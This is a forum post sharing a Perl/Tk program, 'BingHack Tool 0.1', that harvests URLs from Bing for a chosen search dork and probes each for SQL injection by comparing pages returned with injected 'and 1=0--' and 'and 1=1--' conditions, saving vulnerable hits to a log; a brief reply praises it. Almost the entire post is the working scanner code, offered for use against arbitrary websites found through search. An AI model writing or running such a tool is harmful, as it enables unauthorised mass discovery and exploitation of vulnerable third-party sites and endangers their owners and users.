Version Tk de un script en Perl para buscar paginas vulnerables a SQLi usando Bing.
Una imagen
(http://doddyhackman.webcindario.com/images/bing.jpg)
El codigo
#!usr/bin/perl
#BingHack Tool 0.1
#Version Tk
#Coded By Doddy H
use Tk;
use LWP::UserAgent;
my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);
my $color_fondo = "black";
my $color_texto = "green";
if ( $^O eq 'MSWin32' ) {
use Win32::Console;
Win32::Console::Free();
}
my $hj =
MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
$hj->geometry("600x285+20+20");
$hj->resizable( 0, 0 );
$hj->title("BingHack Tool 0.1");
$hj->Label(
-text => "Dork : ",
-font => "Impact1",
-background => $color_fondo,
-foreground => $color_texto
)->place( -x => 18, -y => 22 );
my $dork = $hj->Entry(
-width => 30,
-background => $color_fondo,
-foreground => $color_texto
)->place( -x => 68, -y => 26 );
$hj->Label(
-text => "Pages : ",
-font => "Impact1",
-background => $color_fondo,
-foreground => $color_texto
)->place( -x => 270, -y => 22 );
my $pages = $hj->Entry(
-width => 10,
-background => $color_fondo,
-foreground => $color_texto
)->place( -x => 335, -y => 26 );
$hj->Button(
-text => "Search",
-width => 10,
-background => $color_fondo,
-foreground => $color_texto,
-activebackground => $color_texto,
-command => \&search
)->place( -x => 420, -y => 26 );
$hj->Button(
-text => "Logs",
-width => 10,
-background => $color_fondo,
-foreground => $color_texto,
-activebackground => $color_texto,
-command => \&logs
)->place( -x => 495, -y => 26 );
$hj->Label(
-text => "Links Found",
-font => "Impact",
-background => $color_fondo,
-foreground => $color_texto
)->place( -x => 110, -y => 80 );
my $links = $hj->Listbox(
-width => 40,
-height => 10,
-background => $color_fondo,
-foreground => $color_texto
)->place( -x => 30, -y => 120 );
$hj->Label(
-text => "SQLi Found",
-font => "Impact",
-background => $color_fondo,
-foreground => $color_texto
)->place( -x => 390, -y => 80 );
my $founds = $hj->Listbox(
-width => 40,
-height => 10,
-background => $color_fondo,
-foreground => $color_texto
)->place( -x => 310, -y => 120 );
MainLoop;
sub search {
$links->delete( "0.0", "end" );
$founds->delete( "0.0", "end" );
$hj->update;
$hj->title("BingHack Tool 0.1 [+] Status : Searching");
my @urls = bing( $dork->get, $pages->get );
$hj->update;
for (@urls) {
$hj->update;
$links->insert( "end", $_ );
}
$hj->title("BingHack Tool 0.1 [+] Status : Scanning");
for my $pa (@urls) {
$hj->update;
sql($pa);
}
$hj->update;
$hj->title("BingHack Tool 0.1");
}
sub logs {
my $file = "sql-logs.txt";
if ( -f $file ) {
system($file);
}
else {
$hj->Dialog(
-title => "Error",
-buttons => ["OK"],
-text => "Logs not found",
-background => $color_fondo,
-foreground => $color_text,
-activebackground => $color_text
)->Show();
}
}
sub sql {
my ( $pass1, $pass2 ) = ( "+", "--" );
my $page = shift;
my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 );
my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 );
unless ( $testar1 eq $testar2 ) {
$founds->insert( "end", $page );
savefile( "sql-logs.txt", $page );
}
}
sub savefile {
open( SAVE, ">>" . $_[0] );
print SAVE $_[1] . "\n";
close SAVE;
}
sub bing {
my ( $a, $b ) = @_;
for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
$hj->update;
my $code =
toma( "http://www.bing.com/search?q=" . $a . "&first=" . $pages );
while ( $code =~ /<h3><a href="(.*?)"/mig ) {
push( @founds, $1 );
}
}
my @founds = repes( cortar(@founds) );
return @founds;
}
sub repes {
my @limpio;
foreach $test (@_) {
push @limpio, $test unless $repe{$test}++;
}
return @limpio;
}
sub cortar {
my @nuevo;
for (@_) {
if ( $_ =~ /=/ ) {
@tengo = split( "=", $_ );
push( @nuevo, @tengo[0] . "=" );
}
else {
push( @nuevo, $_ );
}
}
return @nuevo;
}
sub toma {
return $nave->get( $_[0] )->content;
}
#The End ?
Muy bueno Doddy ;D